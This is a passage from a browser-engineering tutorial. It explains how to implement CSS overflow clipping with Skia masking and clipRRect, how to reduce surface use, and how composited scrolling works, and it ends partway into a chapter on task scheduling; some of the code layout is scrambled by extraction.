style="border-radius:30px;background-color:lightblue;overflow:clip">
This test text exists here to ensure that the "div" element is
large enough that the border radius is obvious.</div>
That HTML looks like this:
This test text exists here to ensure that the “div” element is large enough that the border radius is obvious.
Observe that the letters near the corner are cut off to maintain a
sharp rounded edge. (Uhh… actually, at the time of this writing, Safari
does not support overflow: clip
, so if you’re using Safari
you won’t see this effect.The similar overflow: hidden
is supported by
all browsers. However, in this case, overflow: hidden
will
also increase the height of div
until the rounded corners
no longer clip out the text. This is because
overflow:hidden
has different rules for sizing boxes,
having to do with the possibility of the child content being
scrolled—hidden
means “clipped, but might be scrolled by
JavaScript”. If the blue box had not been taller, than it would have
been impossible to see the text, which is really bad if it’s intended
that there should be a way to scroll it on-screen.) That’s
clipping; without the overflow: clip
property these letters
would instead be fully drawn, like we saw earlier in this chapter.
Counterintuitively, we’ll implement clipping using blending modes. We’ll make a new surface (the mask), draw a rounded rectangle into it, and then blend it with the element contents. But we want to see the element contents, not the mask, so when we do this blending we will use destination-in compositing.
Destination-in compositing basically means keeping the pixels of the destination surface that intersect with the source surface. The source surface’s color is not used—just its alpha. In our case, the source surface is the rounded rectangle mask and the destination surface is the content we want to clip, so destination-in fits perfectly. In code, destination-in looks like this:
class Pixel:
def destination_in(self, source):
self.a = self.a * source.a
if self.a == 0: return self
self.r = (self.r * self.a * source.a) / self.a
self.g = (self.g * self.a * source.a) / self.a
self.b = (self.b * self.a * source.a) / self.a
Now, in paint_visual_effects
, we need to create a new
layer, draw the mask image into it, and then blend it with the element
contents with destination-in blending:
def paint_visual_effects(node, cmds, rect):
# ...
= float(node.style.get("border-radius", "0px")[:-2])
border_radius if node.style.get("overflow", "visible") == "clip":
= border_radius
clip_radius else:
= 0
clip_radius
return [
=blend_mode), [
SaveLayer(skia.Paint(BlendMode=opacity), cmds),
SaveLayer(skia.Paint(Alphaf=skia.kDstIn), [
SaveLayer(skia.Paint(BlendMode"white")
DrawRRect(rect, clip_radius,
]),
]), ]
After drawing all of the element contents with cmds
(and
applying opacity), this code draws a rounded rectangle on another layer
to serve as the mask, and uses destination-in blending to clip the
element contents. Here I chose to draw the rounded rectangle in white,
but the color doesn’t matter as long as it’s opaque. On the other hand,
if there’s no clipping, I don’t round the corners of the mask, which
means nothing is clipped out.
Notice how similar this masking technique is to the physical analogy with scissors described earlier, with the two layers playing the role of two sheets of paper and destination-in compositing playing the role of the scissors. This implementation technique for clipping is called masking, and it is very general—you can use it with arbitrarily complex mask shapes, like text, bitmap images, or anything else you can imagine.
Rounded corners have an interesting
history in computing. Features that are simple today were very
complex to implement on early personal computers with limited memory
and no hardware floating-point arithmetic. Even when floating-point
hardware and eventually GPUs became standard, the
border-radius
CSS property didn’t appear in browsers until
around 2010.The lack of
support didn’t stop web developers from putting rounded corners on their
sites before border-radius
was supported. There are a
number of clever ways to do it; this
video walks through several. More recently, the
introduction of animations, visual effects, multi-process compositing,
and hardware
overlays have again rounded corners pretty complex. The
clipRRect
fast path, for example, can fail to apply for
cases such as hardware video overlays and nested rounded corner
clips.
Our browser now works correctly, but uses way too many surfaces. For example, for a single, no-effects-needed div with some text content, there are currently 18 surfaces allocated in the display list. If there’s no blending going on, we should only need one!
Let’s review all the surfaces that our code can create for an element:
But not every element has opacity, blend modes, or clipping applied,
and we could skip creating those surfaces most of the time. To implement
this without making the code hard to read, let’s change
SaveLayer
to take two additional optional parameters:
should_save
and should_paint_cmds
. These
control whether saveLayer
is called and whether subcommands
are actually painted:
class SaveLayer:
def __init__(self, sk_paint, children,
=True, should_paint_cmds=True):
should_saveself.should_save = should_save
self.should_paint_cmds = should_paint_cmds
# ...
def execute(self, canvas):
if self.should_save:
=self.sk_paint)
canvas.saveLayer(paintif self.should_paint_cmds:
for cmd in self.children:
cmd.execute(canvas)if self.should_save:
canvas.restore()
Turn off those parameters if an effect isn’t applied:
def paint_visual_effects(node, cmds, rect):
# ...
= node.style.get("overflow", "visible") == "clip"
needs_clip = blend_mode != skia.BlendMode.kSrcOver or \
needs_blend_isolation
needs_clip= opacity != 1.0
needs_opacity
return [
=blend_mode), [
SaveLayer(skia.Paint(BlendMode=opacity), cmds,
SaveLayer(skia.Paint(Alphaf=needs_opacity),
should_save=skia.kDstIn), [
SaveLayer(skia.Paint(BlendMode"white")
DrawRRect(rect, clip_radius, =needs_clip, should_paint_cmds=needs_clip),
], should_save=needs_blend_isolation),
], should_save ]
Now simple web pages always use a single surface—a huge saving in memory. But we can save even more surfaces. For example, what if there is a blend mode and opacity at the same time: can we use the same surface? Indeed, yes you can! That’s also pretty simple:This works for opacity, but not for filters that “move pixels” such as blur. Such a filter needs to be applied before clipping, not when blending into the parent surface. Otherwise, the edge of the blur will not be sharp.
def paint_visual_effects(node, cmds, rect):
# ...
= node.style.get("overflow", "visible") == "clip"
needs_clip = blend_mode != skia.BlendMode.kSrcOver or \
needs_blend_isolation
needs_clip= opacity != 1.0
needs_opacity
return [
=blend_mode, Alphaf=opacity),
SaveLayer(skia.Paint(BlendMode+ [
cmds =skia.kDstIn), [
SaveLayer(skia.Paint(BlendMode"white")
DrawRRect(rect, clip_radius, =needs_clip, should_paint_cmds=needs_clip),
], should_save=needs_blend_isolation or needs_opacity),
], should_save ]
There’s one more optimization to make: using Skia’s
clipRRect
operation to get rid of the destination-in
blended surface. This operation takes in a rounded rectangle and changes
the canvas state so that all future commands skip drawing any
pixels outside that rounded rectangle.
There are multiple advantages to using clipRRect
over an
explicit destination-in surface. First, most of the time, it allows Skia
to avoid making a surface for the mask.Typically in a browser this
means code in GPU shaders. GPU programs are out of scope for this book,
but if you’re curious there are many online resources describing ways to
do this. It also allows Skia to skip draw operations that
don’t intersect the mask, or dynamically draw only the parts of
operations that intersect it. It’s basically the optimization we
implemented for scrolling in
Chapter 2.This kind
of code is complex for Skia to implement, so it only makes sense to do
it for common patterns, like rounded rectangles. This is why Skia only
supports optimized clips for a few common shapes.
Since clipRRect
changes the canvas state, we’ll need to
restore it once we’re done with clipping. That uses the
save
and restore
methods—you call
save
before calling clipRRect
, and
restore
after finishing drawing the commands that should be
clipped:
# Draw commands that should not be clipped.
canvas.save()
canvas.clipRRect(rounded_rect)
# Draw commands that should be clipped.
canvas.restore()
# Draw commands that should not be clipped.
If you’ve noticed that restore
is used for both saving
state and pushing surfaces, that’s because Skia has a combined stack of
surfaces and canvas states. Unlike saveLayer
, however,
save
never creates a new surface.
Let’s wrap this pattern into a ClipRRect
drawing
command, which like SaveLayer
takes a list of subcommands
and a should_clip
parameter indicating whether the clip is
necessary:If you’re
doing two clips at once, or a clip and a transform, or some other more
complex setup that would benefit from only saving once but doing
multiple things inside it, this pattern of always saving canvas
parameters might be wasteful, but since it doesn’t create a surface it’s
still a big optimization here.
class ClipRRect:
def __init__(self, rect, radius, children, should_clip=True):
self.rect = rect
self.rrect = skia.RRect.MakeRectXY(rect, radius, radius)
self.children = children
self.should_clip = should_clip
def execute(self, canvas):
if self.should_clip:
canvas.save()self.rrect)
canvas.clipRRect(
for cmd in self.children:
cmd.execute(canvas)
if self.should_clip:
canvas.restore()
Now, in paint_visual_effects
, we can use
ClipRRect
instead of destination-in blending with
DrawRRect
(and we can fold the opacity into the
skia.Paint
passed to the outer SaveLayer
,
since that is defined to be applied before blending):
def paint_visual_effects(node, cmds, rect):
# ...
return [
=blend_mode, Alphaf=opacity), [
SaveLayer(skia.Paint(BlendMode
ClipRRect(rect, clip_radius,
cmds,=needs_clip),
should_clip=needs_blend_isolation),
], should_save ]
Of course, clipRRect
only applies for rounded
rectangles, while masking is a general technique that can be used to
implement all sorts of clips and masks (like CSS’s
clip-path
and mask
), so a real browser will
typically have both code paths.
So now, each element uses at most one surface, and even then only if it has opacity or a non-default blend mode. Everything else should look visually the same, but will be faster and use less memory.
Besides using fewer surfaces, real browsers also need to avoid surfaces getting too big. Real browsers use tiling for this, breaking up the surface into a grid of tiles which have their own raster surfaces and their own x and y offset to the page. Whenever content that intersects a tile changes its display list, the tile is re-rastered. Tiles that are not on or “near”For example, tiles that just scrolled off-screen. the screen are not rastered at all. This all happens on the GPU, since surfaces (Skia ones in particular) can be stored on the GPU.
Optimizing away surfaces is great when they’re not needed, but sometimes having more surfaces allows faster scrolling and animations. (In this section we’ll optimize scrolling; animations will have to wait for Chapter 13.)
So far, any time anything changed in the browser chrome or the web page itself, we had to clear the canvas and re-raster everything on it from scratch. This is inefficient—ideally, things should be re-rastered only if they actually change. When the context is complex or the screen is large, rastering too often produces a visible slowdown, and laptop and mobile batteries are drained unnecessarily. Real browsers optimize these situations by using a technique I’ll call browser compositing. The idea is to create a tree of explicitly cached surfaces for different pieces of content. Whenever something changes, we’ll re-raster only the surface where that content appears. Then these surfaces are blended (or “composited”) together to form the final image that the user sees.
Let’s implement this, with a surface for browser chrome and a surface
for the current Tab
’s contents. This way, we’ll only need
to re-raster the Tab
surface if page contents change, but
not when (say) the user types into the address bar. This technique also
allows us to scroll the Tab
without any raster at all—we
can just translate the page contents surface when drawing it.
To start with, we’ll need two new surfaces on Browser
,
chrome_surface
and tab_surface
:We could even use a different
surface for each Tab
, but real browsers don’t do this,
since each surface uses up a lot of memory, and typically users don’t
notice the small raster delay when switching tabs.
class Browser:
def __init__(self):
# ...
self.chrome_surface = skia.Surface(WIDTH, CHROME_PX)
self.tab_surface = None
I’m not explicitly creating tab_surface
right away,
because we need to lay out the page contents to know how tall the
surface needs to be.
We’ll also need to split the browser’s draw
method into
three parts:
draw
will composite the chrome and tab surfaces and
copy the result from Skia to SDL;raster_tab
will draw the page to the
tab_surface
; andraster_chrome
will draw the browser chrome to the
chrome_surface
.Let’s start by doing the split:
class Browser:
def raster_tab(self):
= self.tab_surface.getCanvas()
canvas
canvas.clear(skia.ColorWHITE)# ...
def raster_chrome(self):
= self.chrome_surface.getCanvas()
canvas
canvas.clear(skia.ColorWHITE)# ...
def draw(self):
= self.root_surface.getCanvas()
canvas
canvas.clear(skia.ColorWHITE)# ...
Since we didn’t create the tab_surface
on startup, we
need to create it at the top of raster_tab
:For a very big web page, the
tab_surface
can be much larger than the size of the SDL
window, and therefore take up a very large amount of memory. We’ll
ignore that, but a real browser would only paint and raster surface
content up to a certain distance from the visible region, and
re-paint/raster as the user scrolls.
import math
class Browser:
def raster_tab(self):
= self.tabs[self.active_tab]
active_tab = math.ceil(active_tab.document.height)
tab_height
if not self.tab_surface or \
!= self.tab_surface.height():
tab_height self.tab_surface = skia.Surface(WIDTH, tab_height)
# ...
The way we compute the page bounds here, based on the layout tree’s height, would be incorrect if page elements could stick out below (or to the right) of their parents—but our browser doesn’t support any features like that. Note that we need to recreate the tab surface if the page’s height changes.
Next, we need new code in draw
to copy from the chrome
and tab surfaces to the root surface. Moreover, we need to translate the
tab_surface
down by CHROME_PX
and up by
scroll
, and clips it to only the area of the window that
doesn’t overlap the browser chrome:
class Browser:
def draw(self):
# ...
= skia.Rect.MakeLTRB(0, CHROME_PX, WIDTH, HEIGHT)
tab_rect = CHROME_PX - self.tabs[self.active_tab].scroll
tab_offset
canvas.save()
canvas.clipRect(tab_rect)0, tab_offset)
canvas.translate(self.tab_surface.draw(canvas, 0, 0)
canvas.restore()
= skia.Rect.MakeLTRB(0, 0, WIDTH, CHROME_PX)
chrome_rect
canvas.save()
canvas.clipRect(chrome_rect)self.chrome_surface.draw(canvas, 0, 0)
canvas.restore()
# ...
Finally, everywhere in Browser
that we call
draw
, we now need to call either raster_tab
or
raster_chrome
first. For example, in
handle_click
, we do this:
class Browser:
def handle_click(self, e):
if e.y < CHROME_PX:
# ...
self.raster_chrome()
else:
# ...
self.raster_tab()
self.draw()
Notice how we don’t redraw the chrome when only the tab changes, and
vice versa. In handle_down
, which scrolls the page, we
don’t need to call raster_tab
at all, since scrolling
doesn’t change the page.
We also have some related changes in Tab
. First, we no
longer need to pass around the scroll offset to the execute
methods, or account for CHROME_PX
, because we always draw
the whole tab to the tab surface:
class Tab:
def raster(self, canvas):
for cmd in self.display_list:
cmd.execute(canvas)
Likewise, we can remove the scroll
parameter from each
drawing command’s execute
method:
class DrawRect:
def execute(self, canvas):
= skia.Paint()
paint self.color))
paint.setColor(parse_color(self.rect, paint) canvas.drawRect(
Our browser now uses composited scrolling, making scrolling faster and smoother. In fact, in terms of conceptual phases of execution, our browser is now very close to real browsers: real browsers paint display lists, break content up into different rastered surfaces, and finally draw the tree of surfaces to the screen. There’s more we can do for performance—ideally we’d avoid all duplicate or unnecessary operations—but let’s leave that for the next few chapters.
Real browsers allocate new surfaces for various different situations,
such as implementing accelerated overflow scrolling and animations of
certain CSS properties such as transform
and opacity that can be done without raster. They also allow scrolling
arbitrary HTML elements via overflow: scroll
in CSS. Basic scrolling for DOM elements is very similar to what we’ve
just implemented. But implementing it in its full generality, and with
excellent performance, is extremely challenging. Scrolling is
probably the single most complicated feature in a browser rendering
engine. The corner cases and subtleties involved are almost endless.
So there you have it: our browser can draw not only boring text and boxes but also:
mix-blend-mode
Besides the new features, we’ve upgraded from Tkinter to SDL and Skia, which makes our browser faster and more responsive, and also sets a foundation for more work on browser performance to come.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(canvas)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
class Browser:
def __init__()
def handle_down()
def handle_click(e)
def handle_key(char)
def handle_enter()
def load(url)
def paint_chrome()
def draw()
def raster_tab()
def raster_chrome()
def handle_quit()
EVENT_DISPATCH_CODE
COOKIE_JAR
class URL:
def __init__(url)
def request(top_level_url, payload)
def resolve(url)
def origin()
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
def XMLHttpRequest_send(method, url, body)
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
def allowed_request(url)
def raster(canvas)
FONTS
def get_font(size, weight, style)
def parse_color(color)
def parse_blend_mode(blend_mode_str)
def linespace(font)
class SaveLayer:
def __init__(sk_paint, children, should_save, should_paint_cmds)
def execute(canvas)
class DrawRRect:
def __init__(rect, radius, color)
def execute(canvas)
class ClipRRect:
def __init__(rect, radius, children, should_clip)
def execute(canvas)
def paint_visual_effects(node, cmds, rect)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
CSS transforms: Add support for the transform
CSS property, specifically the translate
and
rotate
transforms.There is a lot more complexity to 3D transforms having to
do with the definition of 3D spaces, flatting, backfaces, and plane
intersections. Skia has built-in support for these via
canvas state.
Filters: The filter
CSS property allows
specifying various kinds of more complex
effects, such as grayscale or blur. These are fun to implement, and
a number of them have built-in support in Skia. Implement, for example,
the blur
filter. Think carefully about when filters occur,
relative to other effects like transparency, clipping, and blending.
Hit testing: If you have an element with a
border-radius
, it’s possible to click outside the element
but inside its containing rectangle, by clicking in the part of the
corner that is “rounded off”. This shouldn’t result in clicking on the
element, but in our browser it currently does. Modify the
click
method to take border radii into account.
Interest region: Our browser now draws the whole web page to
a single surface, and then shows parts of that surface as the user
scrolls. That means a very long web page (like this one!) can create a
large surface, thereby using a lot of memory. Modify the browser so that
the height of that surface is limited, say to 4 * HEIGHT
pixels. The (limited) region of the page drawn to this surface is called
the interest region; you’ll need to track what part of the interest
region is being shown on the screen, and re-raster the interest region
when the user attempts to scroll outside of it.
One way to do this is to filter out all display list items that don’t
intersect the interest rect. Another, easier way is to take advantage of
Skia’s internal optimizations: if you call save
and
clipRect
on a Skia canvas and then some draw operations,
Skia will automatically avoid display item raster work outside of the
clipping rectangle before the next restore
.
Z-index: Right now, elements later in the HTML document are
drawn “on top” of earlier ones. The z-index
CSS property
changes that order: an element with the larger z-index
draws on top (with ties broken by the current order, and with the
default z-index
being 0). For z-index
to have
any effect, the element’s position
property must be set to
something other than static
(the default). Add support for
z-index
. One thing you’ll run into is that with our
browser’s minimal layout features, you might not be able to
create any overlapping elements to test this feature! However,
lots of exercises throughout the book allow you to create overlapping
elements, including transform
and
width
/height
. For an extra challenge, add
support for nested
elements with z-index
properties.
Overflow scrolling: An element with the
overflow
property set to scroll
and a fixed
pixel height
is scrollable. (You’ll want to implement the
width/height exercise from Chapter 6
so that height
is supported.) Implement some version of
overflow: scroll
. I recommend the following user
interaction: the user clicks within a scrollable element to focus it,
and then can press the arrow keys to scroll up and down. You’ll need to
keep track of the layout
overflow. For an extra challenge, make sure you support
scrollable elements nested within other scrollable elements.
Modern browsers must run sophisticated applications while staying responsive to user actions. Doing so means choosing which of its many tasks to prioritize and which to delay until later—tasks like JavaScript callbacks, user input, and rendering. Moreover, browser work must be split across multiple threads, with different threads running events in parallel to maximize responsiveness.
So far, most of the work our browser’s been doing has come from user actions like scrolling, pressing buttons, and clicking on links. But as the web applications our browser runs get more and more sophisticated, they begin querying remote servers, showing animations, and prefetching information for later. And while users are slow and deliberative, leaving long gaps between actions for the browser to catch up, applications can be very demanding. This requires a change in perspective: the browser now has a never-ending queue of tasks to do.
Modern browsers adapt to this reality by multitasking, prioritizing,
and deduplicating work. Every bit of work the browser might do—loading
pages, running scripts, and responding to user actions—is turned into a
task, which can be executed later, where a task is just a
function (plus its arguments) that can be executed:By writing *args
as an argument to Task
, we indicate that a
Task
can be constructed with any number of arguments, which
are then available as the list args
. Then, calling a
function with *args
unpacks the list back into multiple
arguments.
class Task:
def __init__(self, task_code, *args):
self.task_code = task_code
self.args = args
self.__name__ = "task"
def run(self):
self.task_code(*self.args)
self.task_code = None
self.args = None
The point of a task is that it can be created at one point in time, and then run at some later time by a task runner of some kind, according to a scheduling algorithm.The event loops we discussed in Chapter 2 and Chapter 11 are task runners, where the tasks to run are provided by the operating system. In our browser, the task runner will store tasks in a first-in first-out queue:
class TaskRunner:
def __init__(self):
self.tab = tab
self.tasks = []
def schedule_task(self, task):
self.tasks.append(task)
When the time comes to run a task, our task runner can just remove the first task from the queue and run it:First-in-first-out is a simplistic way to choose which task to run next, and real browsers have sophisticated schedulers which consider many different factors.
class TaskRunner:
def run(self):
if len(self.tasks) > 0:
= self.tasks.pop(0)
task task.run()
To run those tasks, we need to call the run
method on
our TaskRunner
, which we can do in the main event loop:
class Tab:
def __init__(self):
self.task_runner = TaskRunner(self)
if __name__ == "__main__":
while